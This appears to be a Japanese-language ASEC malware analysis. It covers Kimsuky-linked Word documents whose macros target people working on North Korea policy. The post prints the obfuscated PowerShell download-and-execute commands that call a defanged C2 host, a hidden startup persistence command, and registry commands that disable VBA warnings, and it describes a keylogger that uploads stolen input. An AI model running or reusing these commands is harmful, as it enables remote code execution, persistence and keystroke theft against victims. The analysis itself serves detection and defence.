対北朝鮮関連の特定人物をターゲットにする不正な Word ドキュメント

ASEC 分析チームは、安全保障および対北朝鮮関連の特定人物をターゲットにする不正な Word ドキュメントが継続的に拡散していることを確認した。拡散が確認された Word ドキュメントのファイル名には、対北朝鮮に関する人物の名前が含まれているケースが多数存在し、当該分野をターゲットに攻撃が行われているものと推定される。最近確認された Word ドキュメントのファイル名は以下の通りである。

日付ファイル名
7/18(作成様式)2022年光復節式辞専門家の事前意見取りまとめ.doc
7/200511_統一部 *** 部長会議録.doc
8/1Asan Symposium 2022.doc
8/3アンケート(研究委員 ヒョン**様).doc
8/4アンケート(総長 アン**様).doc
8/11(企画)セッション6.京畿道「平和と統一のための社会的対話」推進法案.doc
8/16アンケート(博士 チョン**様).doc
8/17韓半島の安全保障と対北朝鮮戦略討論(キム**).doc
確認されたファイル名

Word ドキュメントには不正な VBA マクロが含まれており、このタイプは AhnLab TIP に公開した<2021年 Kimsuky 攻撃ワード(word)ドキュメント事例総整理解析レポート>にて確認されたタイプ B と同じである。全体的な動作方式は以下の図の通りである。

図1. 動作プロセス

直近で確認された「韓半島の安全保障と対北朝鮮戦略討論(キム**).doc」で確認されたマクロコードは以下の通りである。

図2. 確認されたマクロコード

以前「Word ドキュメントを利用した特定の対象に対する APT 攻撃の試み」の記事で確認されたマクロコードよりもやや難読化されている。マクロを実行すると、PowerShell を通じて「hxxp://vjdif.mypressonline[.]com/ho/ng.txt」からさらなるスクリプトをダウンロードする。

[string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$j=$f.Replace(‘wra’,”);$u=$j.Replace(‘eilsdjfe’,’nloadstri’);$x=iex $u;iex $x
実行される PowerShell コマンド
図3. hxxp://vjdif.mypressonline[.]com/ho/ng.txt で確認されたスクリプト

このスクリプトは以下のコマンドを利用してユーザー PC の情報を収集し、%APPDATA%\Ahnalb\Ahnlab.hwp に保存して当該ファイルの内容をエンコードして hxxp://vjdif.mypressonline[.]com/ho/post.php に転送する。

実行コマンド収集情報
GetFolderPath(“Recent”)最近使ったフォルダーのパス
dir $env:ProgramFilesProgramFiles フォルダーの内容
dir “C:\Program Files (x86)C:\Program Files (x86) フォルダーの内容
systeminfoシステム情報
tasklist実行中のプロセスリスト
収集情報

このとき、HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run に AhnlabUpdate という名前のレジストリが存在する場合、情報収集は行わずに直ちにログファイルを転送する。これは、以降のキーロガーでも同じログファイル名(Ahnlab.hwp)を使用するために、当該キーロガーデータを収集するためであると思われる。

データ転送後は hxxp://vjdif.mypressonline.com/ho/ng.down にアクセスしてエンコードされたスクリプトを追加でダウンロードし、実行する。

図4. 生成されたファイル

追加でダウンロードした ng.down ファイルはエンコードされており、Start-Job コマンドによって PowerShell バックグラウンドタスクとして実行される。このスクリプトの機能は以下の通りである。

  • ショートカットの生成

PowerShell コマンドが保存された C:\windows\temp フォルダーに HncSerial.log ファイルを生成する。また、マルウェアが持続的に動作できるように当該ファイルに対するショートカットを Startup フォルダーに生成する。

[string]$a = {(New-Object Net.WebClient).Dokarysuntring(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$b=$a.replace(‘karysun’,’wnloadS’);$c=iex $b;iex $c
HncSerial.log ファイルの内容

ショートカットによって実行される PowerShell コマンドは以下の通りである。

powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:\windows\temp\HncSerial.log’);iex $x}
実行コマンド
図5. 生成されたショートカットファイル
  • Office セキュリティ設定の変更

レジストリ値の変更によってマクロが常に実行されるよう、Office のセキュリティ設定を変更する。

New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\14.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\15.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\16.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\17.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\18.0\Word\Security -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\19.0\Word\Security -Name VBAWarnings -Value 1
レジストリ変更コマンド
  • キーロガー

ユーザーのキー入力を %APPDATA%\Ahnalb\Ahnlab.hwp に記録する。記録された内容はユーザーが PC を起動時に、先に生成されたショートカットファイルが実行されて hxxp://vjdif.mypressonline[.]com/ho/ng.txt にアクセスし、当該ページに存在する PowerShell コマンドが実行されて hxxp://vjdif.mypressonline[.]com/ho/post.php に転送する。

図6. キーロガーの関連コード

対北朝鮮関連の人物をターゲットとする Word ドキュメントは以前から持続的に確認されているため、特に注意が必要である。送信者が不明なメールの添付ファイルや、出どころが不明なファイルは開かないようにしなければならない。また、Word ドキュメントに含まれている不正なマクロが自動で実行されないよう、適切なセキュリティ設定を維持しなければならない。

[ファイル検知]
Downloader/DOC.Kimsuky
Trojan/PowerShell.FileUpload

[IOC]
6f9c20f8f7f28a732b0853929a06b79c (VBA)
hxxp://vjdif.mypressonline[.]com/ho/ng.txt
hxxp://vjdif.mypressonline[.]com/ho/ng.down
hxxp://vjdif.mypressonline[.]com/ho/post.php

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

5 1 vote
評価する
guest
0 コメント
Inline Feedbacks
View all comments